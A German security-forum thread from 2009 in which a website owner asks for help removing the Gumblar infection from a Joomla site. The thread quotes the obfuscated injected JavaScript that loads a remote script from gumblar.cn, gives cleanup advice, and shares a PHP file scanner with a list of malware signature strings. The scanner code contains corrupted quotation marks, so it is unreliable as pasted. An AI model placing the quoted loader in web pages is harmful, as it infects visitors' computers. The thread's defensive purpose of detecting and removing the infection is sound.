Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Gumblar - Redirecter

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 19.05.2009, 10:23   #1
SSC streezer
 
Gumblar - Redirecter - Ausrufezeichen

Gumblar - Redirecter



Hallo zusammen,

leider gibt es noch kein Topic zu meinem Problem. Ich habe seit längerem Scripts auf meiner Website welche sich auf einen Server verbinden der dann einen Trojaner los lässt. Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast).

ich habe diverse massnahmen getroffen denoch krieg ich nicht alles JavaScripts raus welche verantwortlich sind.

ich habe einen Joomla core der aktuellen version (1.5.10). wenn ich den quelltext meiner seite angucke dann sehe ich das javascript. hier ein typisches beispiel:

Code:
ATTFilter
<script language=javascript><!-- 
(function(xwBPE){var k9E='var>20>61>3d>22>53>63r>69p>74Engine>22>2c>62>3d>22V>65>72si>6fn()>2b>22>2cj>3d>22>22>2cu>3dn>61>76iga>74or>2euserAgent>3bi>66((u>2eind>65xOf(>22W>69n>22)>3e0)>26>26(u>2e>69n>64exOf(>22N>54>20>36>22)>3c0)>26>26(do>63u>6dent>2eco>6fk>69e>2ein>64>65xOf>28>22miek>3d1>22>29>3c0)>26>26(>74ype>6ff(zrvzts)>21>3dtyp>65o>66(>22A>22>29)>29>7bz>72>76zts>3d>22A>22>3beval(>22i>66(win>64ow>2e>22+>61+>22>29j>3dj+>22+>61+>22Maj>6f>72>22+b+a>2b>22Mino>72>22>2bb>2ba+>22>42>75>69>6c>64>22+b+>22>6a>3b>22>29>3b>64ocument>2ewrit>65>28>22>3c>73cript>20src>3d>2f>2fgumblar>2ecn>2frss>2f>3fi>64>3d>22+j+>22>3e>3c>5c>2fsc>72>69pt>3e>22)>3b>7d';var hKlRS=k9E.replace(xwBPE,'%');var Mom4=unescape(hKlRS);eval(Mom4)})(/>/g);
 --></script>
         
hat jemand eine ahnung wie ich dieses lästige biest rauskriegen kann aus meiner page?

wenn ihr mehr infos braucht zu meiner page oder im allgemeinen, scheut euch nicht zu fragen

hier findet ihr weitere infos zum trojaner - Gumblar .cn Exploit - 12 Facts About This Injected Script | Unmask Parasites. Blog.

gruss,
streezer

Alt 20.05.2009, 16:21   #2
RORL
 
Gumblar - Redirecter - Standard

Gumblar - Redirecter



Hallo,

nachdem, was ich erfahren durfte mit Gumblar, liegt das Problem nicht auf dem Webspace sondern auf dem Rechner.
Der Trojaner hatte sich dort eingenistet und nur darauf gewartet, das ich Websites update...dabei hat er dann (i.d.R.) die index so wie beschrieben umgeschrieben.
Häufig steckte das Java-Script auch in anderen Unterseiten.

Das hat mir geholfen (bis jetzt):
  1. Den Rechner mit mehreren Virenproggies checken...mir hat symantec online check geholfen
  2. ALLE Ftp-Passwörter ändern und auf keinen Fall mehr im Ftp-Programm speichern, sondern händisch eingeben (auch wenn's nervt)
  3. Auf gar keinen Fall mit Admin-Rechten ins Netz, denn das Script leitet den User auf eine Site, wo man sich noch mehr einfängt, als man sich wünscht - das übrigens zu der Angabe:
    "Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast)."
    Man befindet sich nämlich nicht auf der aufgerufenen Website, sondern auf einem CLON irgendwo auf der Welt.
  4. Den kompletten Webspace löschen und - nachdem der Rechner gereinigt wurde - neu aufsetzen
  5. Nach dem Aufsetzen die Seite aufrufen (NICHT ALS ADMIN!!!) und beobachten, ob im Statusfenster kurzfristig eine andere Adresse erscheint, als die aufgerufene
__________________


Alt 20.05.2009, 22:23   #3
SSC streezer
 
Gumblar - Redirecter - Standard

Gumblar - Redirecter



vielen dank für deine tipps !

habs inzwischen löschen können - mithile dieses scriptes hab ich alle infizierten files gefunden und ändern können. dies jedoch mit enormen aufwand - aber ich musste nich nochmal von vorne anfangen und hab mir dardurch auch ne menge arbeit gespart:
Code:
ATTFilter
<?php
set_time_limit(0);

$exclude_files = array(
$_SERVER['DOCUMENT_ROOT'] . '/' . file_checker.php’,
);

function scan_files($dir) {

global $exclude_files;

// malware strings to search
$search = array(
'.cn/',
'gumblar',
'eval(unescape',
'eval(base64_decode',
'eval(decode',
'eval(base',
'base64_decode',
'(function(){',
'<!--(function(',
'(unescape(',
'(function(xwBPE)',
'eval(String.fromCharCode',
'neglite.com',
'niklejo.net',
'internetcountercheck.com'
);

$dirs_array = array();

 if ($handle = opendir($dir)) {

echo "<br>Open dir: " . $dir . "";

// this is the correct way to loop over the directory.
while (false !== ($file = readdir($handle))) {
if ($file != '.' && $file != '..') {

$path = $dir . $file;

if (is_file($path)) {

// skip large files
if (filesize($path) > 1000000) {
continue;
}

// exlude fieles
if (in_array($path, $exclude_files)) {
continue;
}

// get content
$file_handle = fopen($path, 'r');
$contents = ”;
while (!feof($file_handle)) 
{
$contents = fgets($file_handle);

// loop for search string
$found = false;
foreach ($search as $search_string) {
if (stristr($contents, $search_string)) {
$found = true;
break;
}
}

if ($found == true) {
echo '<br>' . $path . ' … <font color="red">[FOUND ' . $search_string . ']</font>';
break;

}
else {
//echo ‘[CLEAN]‘;
}

}

fclose($file_handle);

} elseif (is_dir($path)) {

$dirs_array[] = $path;

}
}
}
closedir($handle);
}



foreach ($dirs_array as $dir) {
scan_files($dir . '/');
}

unset($dirs_array);
}

$start_dir = $_SERVER['DOCUMENT_ROOT'] . '/';

echo 'Starting from: ' . $start_dir . ”;

scan_files($start_dir);


?>
         
__________________

Alt 29.05.2009, 09:21   #4
Marlboro
 
Gumblar - Redirecter - Standard

Gumblar - Redirecter



hallo zusammen!

bin neu hierher gekommen wg. gumblar ...

@ssc streezer: wie verwende ich das script ... sorry, bin leider nur anwender :-(

Alt 29.05.2009, 10:44   #5
SSC streezer
 
Gumblar - Redirecter - Standard

Gumblar - Redirecter



code kopieren,
in ein leeres .php file kopieren,
auf server laden,
aufrufen


Alt 29.05.2009, 10:52   #6
Marlboro
 
Gumblar - Redirecter - Standard

Gumblar - Redirecter



name des php files ist egal?

thx

Alt 29.05.2009, 11:54   #7
SSC streezer
 
Gumblar - Redirecter - Standard

Gumblar - Redirecter



ja klar - der filename hat doch auf den inhalt keine auswirkungen... nie...

Antwort

Themen zu Gumblar - Redirecter
ahnung, aktuelle, allgemeinen, avast, besuch, brauch, code, diverse, escape, frage, fragen, gen, gumblar, hallo zusammen, infos, krieg, quelltext, seite, server, trojaner, verbinden, version, website, win, zusammen



Ähnliche Themen: Gumblar - Redirecter


  1. Google Redirecter Trojaner entfernen
    Plagegeister aller Art und deren Bekämpfung - 23.06.2011 (16)
  2. Goggle Redirecter gelöst durch Combofix Logfile Frage
    Log-Analyse und Auswertung - 05.05.2010 (0)
  3. lost+found: Rookitschutz, Koobface, Windows 7, Gumblar
    Nachrichten - 10.11.2009 (0)
  4. 50.000 Funde Worm\Gumblar
    Antiviren-, Firewall- und andere Schutzprogramme - 01.06.2009 (7)
  5. Trojan-Downloader.JS.Gumblar.a gefunden
    Plagegeister aller Art und deren Bekämpfung - 28.05.2009 (0)

Zum Thema Gumblar - Redirecter - Hallo zusammen, leider gibt es noch kein Topic zu meinem Problem. Ich habe seit längerem Scripts auf meiner Website welche sich auf einen Server verbinden der dann einen Trojaner los - Gumblar - Redirecter...
Archiv
Du betrachtest: Gumblar - Redirecter auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.